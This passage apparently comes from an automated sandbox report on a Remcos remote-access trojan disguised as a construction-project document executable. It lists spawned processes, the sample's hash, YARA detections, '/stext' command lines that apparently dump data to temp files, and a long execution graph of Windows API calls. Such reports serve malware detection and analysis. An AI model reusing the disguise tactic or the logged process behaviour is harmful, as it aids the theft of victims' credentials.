                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2943881499.000000000246B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2942457183.000000000019F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:low
                                                                                                                        Has exited:false

                                                                                                                        Target ID:5
                                                                                                                        Start time:10:18:53
                                                                                                                        Start date:16/12/2024
                                                                                                                        Path:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe" /stext "C:\Users\user\AppData\Local\Temp\osspeswmhebwmnhvszpvhldf"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:808'698 bytes
                                                                                                                        MD5 hash:92E917F439CC408828A0629D80FDB043
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        Target ID:6
                                                                                                                        Start time:10:18:53
                                                                                                                        Start date:16/12/2024
                                                                                                                        Path:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe" /stext "C:\Users\user\AppData\Local\Temp\zmfiflhnvmtjoudzbkcxkyywgeg"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:808'698 bytes
                                                                                                                        MD5 hash:92E917F439CC408828A0629D80FDB043
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        Target ID:7
                                                                                                                        Start time:10:18:53
                                                                                                                        Start date:16/12/2024
                                                                                                                        Path:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe" /stext "C:\Users\user\AppData\Local\Temp\jokafdshjuloyardsuwyvdtnhlpesm"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:808'698 bytes
                                                                                                                        MD5 hash:92E917F439CC408828A0629D80FDB043
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true


                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:20.3%
                                                                                                                          Dynamic/Decrypted Code Coverage:14%
                                                                                                                          Signature Coverage:19.7%
                                                                                                                          Total number of Nodes:1510
                                                                                                                          Total number of Limit Nodes:45
5330 40140b 2 API calls 5328->5330 5329 4049a7 SendMessageW 5329->5322 5330->5327 5332->5329 5333 401c8e 5334 402b1d 18 API calls 5333->5334 5335 401c94 IsWindow 5334->5335 5336 4019f0 5335->5336 5337 1000164f 5338 10001516 GlobalFree 5337->5338 5340 10001667 5338->5340 5339 100016ad GlobalFree 5340->5339 5341 10001682 5340->5341 5342 10001699 VirtualFree 5340->5342 5341->5339 5342->5339 5343 401491 5344 405234 25 API calls 5343->5344 5345 401498 5344->5345 4528 402295 4529 402b3a 18 API calls 4528->4529 4530 4022a4 4529->4530 4531 402b3a 18 API calls 4530->4531 4532 4022ad 4531->4532 4533 402b3a 18 API calls 4532->4533 4534 4022b7 GetPrivateProfileStringW 4533->4534 4540 401f98 4541 401faa 4540->4541 4551 40205c 4540->4551 4542 402b3a 18 API calls 4541->4542 4544 401fb1 4542->4544 4543 401423 25 API calls 4545 402197 4543->4545 4546 402b3a 18 API calls 4544->4546 4547 401fba 4546->4547 4548 401fd0 LoadLibraryExW 4547->4548 4549 401fc2 GetModuleHandleW 4547->4549 4550 401fe1 4548->4550 4548->4551 4549->4548 4549->4550 4563 406362 WideCharToMultiByte 4550->4563 4551->4543 4554 401ff2 4556 402011 4554->4556 4557 401ffa 4554->4557 4555 40202b 4558 405234 25 API calls 4555->4558 4566 10001759 4556->4566 4608 401423 4557->4608 4559 402002 4558->4559 4559->4545 4561 40204e FreeLibrary 4559->4561 4561->4545 4564 40638c GetProcAddress 4563->4564 4565 401fec 4563->4565 4564->4565 4565->4554 4565->4555 4567 10001789 4566->4567 4611 10001b18 4567->4611 4569 10001790 4570 100018a6 4569->4570 4571 100017a1 4569->4571 4572 100017a8 4569->4572 4570->4559 4660 10002286 4571->4660 4643 100022d0 4572->4643 4577 1000180c 4581 10001812 4577->4581 4582 1000184e 4577->4582 4578 100017ee 4673 100024a9 4578->4673 4579 100017d7 4592 100017cd 4579->4592 4670 10002b5f 4579->4670 4580 100017be 4584 100017c4 4580->4584 4585 100017cf 4580->4585 4587 100015b4 3 API calls 4581->4587 4589 100024a9 10 API calls 4582->4589 4584->4592 4654 100028a4 4584->4654 4664 10002645 4585->4664 4594 10001828 
4587->4594 4595 10001840 4589->4595 4590 100017f4 4684 100015b4 4590->4684 4592->4577 4592->4578 4598 100024a9 10 API calls 4594->4598 4607 10001895 4595->4607 4695 1000246c 4595->4695 4597 100017d5 4597->4592 4598->4595 4601 1000189f GlobalFree 4601->4570 4604 10001881 4604->4607 4699 1000153d wsprintfW 4604->4699 4605 1000187a FreeLibrary 4605->4604 4607->4570 4607->4601 4609 405234 25 API calls 4608->4609 4610 401431 4609->4610 4610->4559 4702 1000121b GlobalAlloc 4611->4702 4613 10001b3c 4703 1000121b GlobalAlloc 4613->4703 4615 10001d7a GlobalFree GlobalFree GlobalFree 4616 10001d97 4615->4616 4635 10001de1 4615->4635 4617 100020ee 4616->4617 4626 10001dac 4616->4626 4616->4635 4619 10002110 GetModuleHandleW 4617->4619 4617->4635 4618 10001c1d GlobalAlloc 4639 10001b47 4618->4639 4622 10002121 LoadLibraryW 4619->4622 4623 10002136 4619->4623 4620 10001c68 lstrcpyW 4624 10001c72 lstrcpyW 4620->4624 4621 10001c86 GlobalFree 4621->4639 4622->4623 4622->4635 4710 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4623->4710 4624->4639 4626->4635 4706 1000122c 4626->4706 4627 10002188 4629 10002195 lstrlenW 4627->4629 4627->4635 4711 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4629->4711 4630 10002148 4630->4627 4642 10002172 GetProcAddress 4630->4642 4631 10002048 4634 10002090 lstrcpyW 4631->4634 4631->4635 4634->4635 4635->4569 4636 10001cc4 4636->4639 4704 1000158f GlobalSize GlobalAlloc 4636->4704 4637 10001f37 GlobalFree 4637->4639 4638 100021af 4638->4635 4639->4615 4639->4618 4639->4620 4639->4621 4639->4624 4639->4631 4639->4635 4639->4636 4639->4637 4640 1000122c 2 API calls 4639->4640 4709 1000121b GlobalAlloc 4639->4709 4640->4639 4642->4627 4644 100022e8 4643->4644 4646 10002415 GlobalFree 4644->4646 4648 100023d3 lstrlenW 4644->4648 4649 100023ba GlobalAlloc 4644->4649 4650 1000238f GlobalAlloc WideCharToMultiByte 4644->4650 4651 1000122c GlobalAlloc lstrcpynW 4644->4651 
4713 100012ba 4644->4713 4646->4644 4647 100017ae 4646->4647 4647->4579 4647->4580 4647->4592 4648->4646 4652 100023d1 4648->4652 4649->4652 4650->4646 4651->4644 4652->4646 4717 100025d9 4652->4717 4655 100028b6 4654->4655 4656 1000295b VirtualAlloc 4655->4656 4657 10002979 4656->4657 4658 10002a75 4657->4658 4659 10002a6a GetLastError 4657->4659 4658->4592 4659->4658 4661 10002296 4660->4661 4662 100017a7 4660->4662 4661->4662 4663 100022a8 GlobalAlloc 4661->4663 4662->4572 4663->4661 4665 10002661 4664->4665 4666 100026b2 GlobalAlloc 4665->4666 4667 100026c5 4665->4667 4669 100026d4 4666->4669 4668 100026ca GlobalSize 4667->4668 4667->4669 4668->4669 4669->4597 4671 10002b6a 4670->4671 4672 10002baa GlobalFree 4671->4672 4720 1000121b GlobalAlloc 4673->4720 4675 10002530 StringFromGUID2 4680 100024b3 4675->4680 4676 10002541 lstrcpynW 4676->4680 4677 1000250b MultiByteToWideChar 4677->4680 4678 10002571 GlobalFree 4678->4680 4679 10002554 wsprintfW 4679->4680 4680->4675 4680->4676 4680->4677 4680->4678 4680->4679 4681 100025ac GlobalFree 4680->4681 4682 10001272 2 API calls 4680->4682 4721 100012e1 4680->4721 4681->4590 4682->4680 4725 1000121b GlobalAlloc 4684->4725 4686 100015ba 4687 100015c7 lstrcpyW 4686->4687 4689 100015e1 4686->4689 4690 100015fb 4687->4690 4689->4690 4691 100015e6 wsprintfW 4689->4691 4692 10001272 4690->4692 4691->4690 4693 100012b5 GlobalFree 4692->4693 4694 1000127b GlobalAlloc lstrcpynW 4692->4694 4693->4595 4694->4693 4696 1000247a 4695->4696 4698 10001861 4695->4698 4697 10002496 GlobalFree 4696->4697 4696->4698 4697->4696 4698->4604 4698->4605 4700 10001272 2 API calls 4699->4700 4701 1000155e 4700->4701 4701->4607 4702->4613 4703->4639 4705 100015ad 4704->4705 4705->4636 4712 1000121b GlobalAlloc 4706->4712 4708 1000123b lstrcpynW 4708->4635 4709->4639 4710->4630 4711->4638 4712->4708 4714 100012c1 4713->4714 4715 1000122c 2 API calls 4714->4715 4716 100012df 4715->4716 4716->4644 4718 100025e7 VirtualAlloc 4717->4718 4719 
1000263d 4717->4719 4718->4719 4719->4652 4720->4680 4722 100012ea 4721->4722 4723 1000130c 4721->4723 4722->4723 4724 100012f0 lstrcpyW 4722->4724 4723->4680 4724->4723 4725->4686 5360 10001058 5362 10001074 5360->5362 5361 100010dd 5362->5361 5363 10001516 GlobalFree 5362->5363 5364 10001092 5362->5364 5363->5364 5365 10001516 GlobalFree 5364->5365 5366 100010a2 5365->5366 5367 100010b2 5366->5367 5368 100010a9 GlobalSize 5366->5368 5369 100010b6 GlobalAlloc 5367->5369 5370 100010c7 5367->5370 5368->5367 5371 1000153d 3 API calls 5369->5371 5372 100010d2 GlobalFree 5370->5372 5371->5370 5372->5361 5373 401718 5374 402b3a 18 API calls 5373->5374 5375 40171f SearchPathW 5374->5375 5376 40173a 5375->5376 4962 40159b 4963 402b3a 18 API calls 4962->4963 4964 4015a2 SetFileAttributesW 4963->4964 4965 4015b4 4964->4965 5377 40149e 5378 4014ac PostQuitMessage 5377->5378 5379 40223e 5377->5379 5378->5379 5387 4021a0 5388 402b3a 18 API calls 5387->5388 5389 4021a6 5388->5389 5390 402b3a 18 API calls 5389->5390 5391 4021af 5390->5391 5392 402b3a 18 API calls 5391->5392 5393 4021b8 5392->5393 5394 4062cf 2 API calls 5393->5394 5395 4021c1 5394->5395 5396 4021d2 lstrlenW lstrlenW 5395->5396 5400 4021c5 5395->5400 5398 405234 25 API calls 5396->5398 5397 405234 25 API calls 5401 4021cd 5397->5401 5399 402210 SHFileOperationW 5398->5399 5399->5400 5399->5401 5400->5397 5400->5401 5402 100010e1 5403 10001111 5402->5403 5404 100011d8 GlobalFree 5403->5404 5405 100012ba 2 API calls 5403->5405 5406 100011d3 5403->5406 5407 100011f8 GlobalFree 5403->5407 5408 10001272 2 API calls 5403->5408 5409 10001164 GlobalAlloc 5403->5409 5410 100012e1 lstrcpyW 5403->5410 5411 100011c4 GlobalFree 5403->5411 5405->5403 5406->5404 5407->5403 5408->5411 5409->5403 5410->5403 5411->5403 5412 401b22 5413 401b73 5412->5413 5414 401b2f 5412->5414 5415 401b78 5413->5415 5416 401b9d GlobalAlloc 5413->5416 5420 401bb8 5414->5420 5421 401b46 5414->5421 5422 40223e 5415->5422 5433 405f8c lstrcpynW 
5415->5433 5418 405fae 18 API calls 5416->5418 5417 405fae 18 API calls 5424 402238 5417->5424 5418->5420 5420->5417 5420->5422 5431 405f8c lstrcpynW 5421->5431 5423 401b8a GlobalFree 5423->5422 5426 405768 MessageBoxIndirectW 5424->5426 5426->5422 5427 401b55 5432 405f8c lstrcpynW 5427->5432 5429 401b64 5434 405f8c lstrcpynW 5429->5434 5431->5427 5432->5429 5433->5423 5434->5422 5435 4029a2 SendMessageW 5436 4029c7 5435->5436 5437 4029bc InvalidateRect 5435->5437 5437->5436 4109 401924 4110 401926 4109->4110 4111 402b3a 18 API calls 4110->4111 4112 40192b 4111->4112 4115 405814 4112->4115 4151 405adf 4115->4151 4118 40583c DeleteFileW 4123 401934 4118->4123 4119 405853 4120 405973 4119->4120 4165 405f8c lstrcpynW 4119->4165 4120->4123 4195 4062cf FindFirstFileW 4120->4195 4122 405879 4124 40588c 4122->4124 4125 40587f lstrcatW 4122->4125 4186 405a23 lstrlenW 4124->4186 4127 405892 4125->4127 4129 4058a2 lstrcatW 4127->4129 4131 4058ad lstrlenW FindFirstFileW 4127->4131 4129->4131 4131->4120 4149 4058cf 4131->4149 4134 405956 FindNextFileW 4138 40596c FindClose 4134->4138 4134->4149 4135 4057cc 5 API calls 4137 4059ae 4135->4137 4139 4059b2 4137->4139 4140 4059c8 4137->4140 4138->4120 4139->4123 4143 405234 25 API calls 4139->4143 4141 405234 25 API calls 4140->4141 4141->4123 4145 4059bf 4143->4145 4144 405814 64 API calls 4144->4149 4147 405e26 40 API calls 4145->4147 4147->4123 4148 405234 25 API calls 4148->4149 4149->4134 4149->4144 4149->4148 4166 405f8c lstrcpynW 4149->4166 4167 4057cc 4149->4167 4175 405234 4149->4175 4190 405e26 4149->4190 4201 405f8c lstrcpynW 4151->4201 4153 405af0 4202 405a82 CharNextW CharNextW 4153->4202 4156 405834 4156->4118 4156->4119 4157 406220 5 API calls 4163 405b06 4157->4163 4158 405b37 lstrlenW 4159 405b42 4158->4159 4158->4163 4161 4059d7 3 API calls 4159->4161 4160 4062cf 2 API calls 4160->4163 4162 405b47 GetFileAttributesW 4161->4162 4162->4156 4163->4156 4163->4158 4163->4160 4164 405a23 2 API calls 4163->4164 
4164->4158 4165->4122 4166->4149 4208 405bd3 GetFileAttributesW 4167->4208 4170 4057f9 4170->4149 4171 4057e7 RemoveDirectoryW 4173 4057f5 4171->4173 4172 4057ef DeleteFileW 4172->4173 4173->4170 4174 405805 SetFileAttributesW 4173->4174 4174->4170 4176 4052f1 4175->4176 4177 40524f 4175->4177 4176->4134 4178 40526b lstrlenW 4177->4178 4179 405fae 18 API calls 4177->4179 4180 405294 4178->4180 4181 405279 lstrlenW 4178->4181 4179->4178 4183 4052a7 4180->4183 4184 40529a SetWindowTextW 4180->4184 4181->4176 4182 40528b lstrcatW 4181->4182 4182->4180 4183->4176 4185 4052ad SendMessageW SendMessageW SendMessageW 4183->4185 4184->4183 4185->4176 4187 405a31 4186->4187 4188 405a43 4187->4188 4189 405a37 CharPrevW 4187->4189 4188->4127 4189->4187 4189->4188 4211 4062f6 GetModuleHandleA 4190->4211 4194 405e4e 4194->4149 4196 405998 4195->4196 4197 4062e5 FindClose 4195->4197 4196->4123 4198 4059d7 lstrlenW CharPrevW 4196->4198 4197->4196 4199 4059f3 lstrcatW 4198->4199 4200 4059a2 4198->4200 4199->4200 4200->4135 4201->4153 4203 405a9f 4202->4203 4205 405ab1 4202->4205 4203->4205 4206 405aac CharNextW 4203->4206 4204 405ad5 4204->4156 4204->4157 4205->4204 4207 405a04 CharNextW 4205->4207 4206->4204 4207->4205 4209 4057d8 4208->4209 4210 405be5 SetFileAttributesW 4208->4210 4209->4170 4209->4171 4209->4172 4210->4209 4212 406312 LoadLibraryA 4211->4212 4213 40631d GetProcAddress 4211->4213 4212->4213 4214 405e2d 4212->4214 4213->4214 4214->4194 4215 405caa lstrcpyW 4214->4215 4216 405cd3 4215->4216 4217 405cf9 GetShortPathNameW 4215->4217 4240 405bf8 GetFileAttributesW CreateFileW 4216->4240 4218 405e20 4217->4218 4219 405d0e 4217->4219 4218->4194 4219->4218 4221 405d16 wsprintfA 4219->4221 4223 405fae 18 API calls 4221->4223 4222 405cdd CloseHandle GetShortPathNameW 4222->4218 4224 405cf1 4222->4224 4225 405d3e 4223->4225 4224->4217 4224->4218 4241 405bf8 GetFileAttributesW CreateFileW 4225->4241 4227 405d4b 4227->4218 4228 405d5a GetFileSize GlobalAlloc 4227->4228 4229 
405e19 CloseHandle 4228->4229 4230 405d7c 4228->4230 4229->4218 4242 405c7b ReadFile 4230->4242 4235 405d9b lstrcpyA 4238 405dbd 4235->4238 4236 405daf 4237 405b5d 4 API calls 4236->4237 4237->4238 4239 405df4 SetFilePointer WriteFile GlobalFree 4238->4239 4239->4229 4240->4222 4241->4227 4243 405c99 4242->4243 4243->4229 4244 405b5d lstrlenA 4243->4244 4245 405b9e lstrlenA 4244->4245 4246 405ba6 4245->4246 4247 405b77 lstrcmpiA 4245->4247 4246->4235 4246->4236 4247->4246 4248 405b95 CharNextA 4247->4248 4248->4245 5438 402224 5439 40222b 5438->5439 5442 40223e 5438->5442 5440 405fae 18 API calls 5439->5440 5441 402238 5440->5441 5443 405768 MessageBoxIndirectW 5441->5443 5443->5442 5444 4051a8 5445 4051b8 5444->5445 5446 4051cc 5444->5446 5447 4051be 5445->5447 5456 405215 5445->5456 5448 4051d4 IsWindowVisible 5446->5448 5453 4051eb 5446->5453 5451 4041e6 SendMessageW 5447->5451 5449 4051e1 5448->5449 5448->5456 5457 404afe SendMessageW 5449->5457 5450 40521a CallWindowProcW 5454 4051c8 5450->5454 5451->5454 5453->5450 5462 404b7e 5453->5462 5456->5450 5458 404b21 GetMessagePos ScreenToClient SendMessageW 5457->5458 5459 404b5d SendMessageW 5457->5459 5460 404b55 5458->5460 5461 404b5a 5458->5461 5459->5460 5460->5453 5461->5459 5471 405f8c lstrcpynW 5462->5471 5464 404b91 5472 405ed3 wsprintfW 5464->5472 5466 404b9b 5467 40140b 2 API calls 5466->5467 5468 404ba4 5467->5468 5473 405f8c lstrcpynW 5468->5473 5470 404bab 5470->5456 5471->5464 5472->5466 5473->5470 5474 402729 5475 402730 5474->5475 5476 4029c7 5474->5476 5477 402736 FindClose 5475->5477 5477->5476 5478 401cab 5479 402b1d 18 API calls 5478->5479 5480 401cb2 5479->5480 5481 402b1d 18 API calls 5480->5481 5482 401cba GetDlgItem 5481->5482 5483 4024e8 5482->5483 5491 4042ae lstrcpynW lstrlenW 5492 4016af 5493 402b3a 18 API calls 5492->5493 5494 4016b5 GetFullPathNameW 5493->5494 5495 4016f1 5494->5495 5496 4016cf 5494->5496 5497 401706 GetShortPathNameW 5495->5497 5498 4029c7 5495->5498 5496->5495 5499 
4062cf 2 API calls 5496->5499 5497->5498 5500 4016e1 5499->5500 5500->5495 5502 405f8c lstrcpynW 5500->5502 5502->5495 5503 404bb0 GetDlgItem GetDlgItem 5504 404c02 7 API calls 5503->5504 5511 404e1b 5503->5511 5505 404ca5 DeleteObject 5504->5505 5506 404c98 SendMessageW 5504->5506 5507 404cae 5505->5507 5506->5505 5509 404ce5 5507->5509 5510 405fae 18 API calls 5507->5510 5508 404eff 5513 404fab 5508->5513 5518 404e0e 5508->5518 5523 404f58 SendMessageW 5508->5523 5512 40419a 19 API calls 5509->5512 5514 404cc7 SendMessageW SendMessageW 5510->5514 5511->5508 5521 404afe 5 API calls 5511->5521 5537 404e8c 5511->5537 5517 404cf9 5512->5517 5515 404fb5 SendMessageW 5513->5515 5516 404fbd 5513->5516 5514->5507 5515->5516 5525 404fd6 5516->5525 5526 404fcf ImageList_Destroy 5516->5526 5534 404fe6 5516->5534 5522 40419a 19 API calls 5517->5522 5519 404201 8 API calls 5518->5519 5524 4051a1 5519->5524 5520 404ef1 SendMessageW 5520->5508 5521->5537 5538 404d07 5522->5538 5523->5518 5528 404f6d SendMessageW 5523->5528 5529 404fdf GlobalFree 5525->5529 5525->5534 5526->5525 5527 405155 5527->5518 5532 405167 ShowWindow GetDlgItem ShowWindow 5527->5532 5531 404f80 5528->5531 5529->5534 5530 404ddc GetWindowLongW SetWindowLongW 5533 404df5 5530->5533 5539 404f91 SendMessageW 5531->5539 5532->5518 5535 404e13 5533->5535 5536 404dfb ShowWindow 5533->5536 5534->5527 5546 404b7e 4 API calls 5534->5546 5549 405021 5534->5549 5555 4041cf SendMessageW 5535->5555 5554 4041cf SendMessageW 5536->5554 5537->5508 5537->5520 5538->5530 5540 404dd6 5538->5540 5543 404d57 SendMessageW 5538->5543 5544 404d93 SendMessageW 5538->5544 5545 404da4 SendMessageW 5538->5545 5539->5513 5540->5530 5540->5533 5543->5538 5544->5538 5545->5538 5546->5549 5547 40512b InvalidateRect 5547->5527 5548 405141 5547->5548 5556 404ab9 5548->5556 5550 40504f SendMessageW 5549->5550 5551 405065 5549->5551 5550->5551 5551->5547 5553 4050d9 SendMessageW SendMessageW 5551->5553 5553->5551 5554->5518 5555->5511 5559 
4049f0 5556->5559 5558 404ace 5558->5527 5560 404a09 5559->5560 5561 405fae 18 API calls 5560->5561 5562 404a6d 5561->5562 5563 405fae 18 API calls 5562->5563 5564 404a78 5563->5564 5565 405fae 18 API calls 5564->5565 5566 404a8e lstrlenW wsprintfW SetDlgItemTextW 5565->5566 5566->5558 4307 402331 4308 402337 4307->4308 4309 402b3a 18 API calls 4308->4309 4310 402349 4309->4310 4311 402b3a 18 API calls 4310->4311 4312 402353 RegCreateKeyExW 4311->4312 4313 402793 4312->4313 4314 40237d 4312->4314 4315 402398 4314->4315 4316 402b3a 18 API calls 4314->4316 4317 4023a4 4315->4317 4320 402b1d 18 API calls 4315->4320 4319 40238e lstrlenW 4316->4319 4318 4023bf RegSetValueExW 4317->4318 4324 403062 4317->4324 4322 4023d5 RegCloseKey 4318->4322 4319->4315 4320->4317 4322->4313 4325 403072 SetFilePointer 4324->4325 4326 40308e 4324->4326 4325->4326 4339 40317d GetTickCount 4326->4339 4329 403139 4329->4318 4330 405c7b ReadFile 4331 4030ae 4330->4331 4331->4329 4332 40317d 43 API calls 4331->4332 4333 4030c5 4332->4333 4333->4329 4334 40313f ReadFile 4333->4334 4336 4030d5 4333->4336 4334->4329 4336->4329 4337 405c7b ReadFile 4336->4337 4338 403108 WriteFile 4336->4338 4337->4336 4338->4329 4338->4336 4340 4032e7 4339->4340 4341 4031ac 4339->4341 4342 402d1a 33 API calls 4340->4342 4352 40330f SetFilePointer 4341->4352 4344 403095 4342->4344 4344->4329 4344->4330 4345 4031b7 SetFilePointer 4347 4031dc 4345->4347 4347->4344 4350 403271 WriteFile 4347->4350 4351 4032c8 SetFilePointer 4347->4351 4353 4032f9 4347->4353 4356 406432 4347->4356 4363 402d1a 4347->4363 4350->4344 4350->4347 4351->4340 4352->4345 4354 405c7b ReadFile 4353->4354 4355 40330c 4354->4355 4355->4347 4357 406457 4356->4357 4358 40645f 4356->4358 4357->4347 4358->4357 4359 4064e6 GlobalFree 4358->4359 4360 4064ef GlobalAlloc 4358->4360 4361 406566 GlobalAlloc 4358->4361 4362 40655d GlobalFree 4358->4362 4359->4360 4360->4357 4360->4358 4361->4357 4361->4358 4362->4361 4364 402d43 4363->4364 4365 402d2b 
4363->4365 4366 402d53 GetTickCount 4364->4366 4367 402d4b 4364->4367 4368 402d34 DestroyWindow 4365->4368 4369 402d3b 4365->4369 4366->4369 4371 402d61 4366->4371 4370 40632f 2 API calls 4367->4370 4368->4369 4369->4347 4370->4369 4372 402d96 CreateDialogParamW ShowWindow 4371->4372 4373 402d69 4371->4373 4372->4369 4373->4369 4378 402cfe 4373->4378 4375 402d77 wsprintfW 4376 405234 25 API calls 4375->4376 4377 402d94 4376->4377 4377->4369 4379 402d0d 4378->4379 4380 402d0f MulDiv 4378->4380 4379->4380 4380->4375 5567 404635 5568 404661 5567->5568 5569 404672 5567->5569 5628 40574c GetDlgItemTextW 5568->5628 5571 40467e GetDlgItem 5569->5571 5576 4046dd 5569->5576 5573 404692 5571->5573 5572 40466c 5575 406220 5 API calls 5572->5575 5578 4046a6 SetWindowTextW 5573->5578 5583 405a82 4 API calls 5573->5583 5574 4047c1 5625 40496f 5574->5625 5630 40574c GetDlgItemTextW 5574->5630 5575->5569 5576->5574 5580 405fae 18 API calls 5576->5580 5576->5625 5581 40419a 19 API calls 5578->5581 5579 4047f1 5584 405adf 18 API calls 5579->5584 5585 404751 SHBrowseForFolderW 5580->5585 5586 4046c2 5581->5586 5582 404201 8 API calls 5587 404983 5582->5587 5588 40469c 5583->5588 5589 4047f7 5584->5589 5585->5574 5590 404769 CoTaskMemFree 5585->5590 5591 40419a 19 API calls 5586->5591 5588->5578 5592 4059d7 3 API calls 5588->5592 5631 405f8c lstrcpynW 5589->5631 5593 4059d7 3 API calls 5590->5593 5594 4046d0 5591->5594 5592->5578 5595 404776 5593->5595 5629 4041cf SendMessageW 5594->5629 5598 4047ad SetDlgItemTextW 5595->5598 5603 405fae 18 API calls 5595->5603 5598->5574 5599 4046d6 5601 4062f6 3 API calls 5599->5601 5600 40480e 5602 4062f6 3 API calls 5600->5602 5601->5576 5610 404816 5602->5610 5604 404795 lstrcmpiW 5603->5604 5604->5598 5607 4047a6 lstrcatW 5604->5607 5605 404855 5632 405f8c lstrcpynW 5605->5632 5607->5598 5608 40485e 5609 405a82 4 API calls 5608->5609 5611 404864 GetDiskFreeSpaceW 5609->5611 5610->5605 5613 405a23 2 API calls 5610->5613 5615 4048ad 5610->5615 
5614 404886 MulDiv 5611->5614 5611->5615 5613->5610 5614->5615 5616 404ab9 21 API calls 5615->5616 5626 40491e 5615->5626 5618 40490b 5616->5618 5617 40140b 2 API calls 5619 404941 5617->5619 5621 404920 SetDlgItemTextW 5618->5621 5622 404910 5618->5622 5633 4041bc KiUserCallbackDispatcher 5619->5633 5621->5626 5624 4049f0 21 API calls 5622->5624 5623 40495d 5623->5625 5634 4045ca 5623->5634 5624->5626 5625->5582 5626->5617 5626->5619 5628->5572 5629->5599 5630->5579 5631->5600 5632->5608 5633->5623 5635 4045d8 5634->5635 5636 4045dd SendMessageW 5634->5636 5635->5636 5636->5625 5637 4028b6 5638 402b1d 18 API calls 5637->5638 5639 4028bc 5638->5639 5640 4028f8 5639->5640 5641 4028df 5639->5641 5646 402793 5639->5646 5643 402902 5640->5643 5644 40290e 5640->5644 5642 4028e4 5641->5642 5650 4028f5 5641->5650 5651 405f8c lstrcpynW 5642->5651 5647 402b1d 18 API calls 5643->5647 5645 405fae 18 API calls 5644->5645 5645->5650 5647->5650 5650->5646 5652 405ed3 wsprintfW 5650->5652 5651->5646 5652->5646 5653 404337 5655 404469 5653->5655 5656 40434f 5653->5656 5654 4044d3 5657 4045a5 5654->5657 5658 4044dd GetDlgItem 5654->5658 5655->5654 5655->5657 5663 4044a4 GetDlgItem SendMessageW 5655->5663 5661 40419a 19 API calls 5656->5661 5662 404201 8 API calls 5657->5662 5659 404566 5658->5659 5660 4044f7 5658->5660 5659->5657 5668 404578 5659->5668 5660->5659 5667 40451d 6 API calls 5660->5667 5664 4043b6 5661->5664 5666 4045a0 5662->5666 5684 4041bc KiUserCallbackDispatcher 5663->5684 5665 40419a 19 API calls 5664->5665 5670 4043c3 CheckDlgButton 5665->5670 5667->5659 5671 40458e 5668->5671 5672 40457e SendMessageW 5668->5672 5682 4041bc KiUserCallbackDispatcher 5670->5682 5671->5666 5675 404594 SendMessageW 5671->5675 5672->5671 5673 4044ce 5676 4045ca SendMessageW 5673->5676 5675->5666 5676->5654 5677 4043e1 GetDlgItem 5683 4041cf SendMessageW 5677->5683 5679 4043f7 SendMessageW 5680 404414 GetSysColor 5679->5680 5681 40441d SendMessageW SendMessageW lstrlenW SendMessageW 
SendMessageW 5679->5681 5680->5681 5681->5666 5682->5677 5683->5679 5684->5673 5685 4014b8 5686 4014be 5685->5686 5687 401389 2 API calls 5686->5687 5688 4014c6 5687->5688 4735 4015b9 4736 402b3a 18 API calls 4735->4736 4737 4015c0 4736->4737 4738 405a82 4 API calls 4737->4738 4748 4015c9 4738->4748 4739 401614 4740 401646 4739->4740 4741 401619 4739->4741 4746 401423 25 API calls 4740->4746 4744 401423 25 API calls 4741->4744 4742 405a04 CharNextW 4743 4015d7 CreateDirectoryW 4742->4743 4745 4015ed GetLastError 4743->4745 4743->4748 4747 401620 4744->4747 4745->4748 4749 4015fa GetFileAttributesW 4745->4749 4752 40163e 4746->4752 4753 405f8c lstrcpynW 4747->4753 4748->4739 4748->4742 4749->4748 4751 40162d SetCurrentDirectoryW 4751->4752 4753->4751 5689 401939 5690 402b3a 18 API calls 5689->5690 5691 401940 lstrlenW 5690->5691 5692 4024e8 5691->5692 5693 40293b 5694 402b1d 18 API calls 5693->5694 5695 402941 5694->5695 5696 402974 5695->5696 5698 40294f 5695->5698 5699 402793 5695->5699 5697 405fae 18 API calls 5696->5697 5696->5699 5697->5699 5698->5699 5701 405ed3 wsprintfW 5698->5701 5701->5699 4966 40173f 4967 402b3a 18 API calls 4966->4967 4968 401746 4967->4968 4969 405c27 2 API calls 4968->4969 4970 40174d 4969->4970 4971 405c27 2 API calls 4970->4971 4971->4970 5702 10002a7f 5703 10002a97 5702->5703 5704 1000158f 2 API 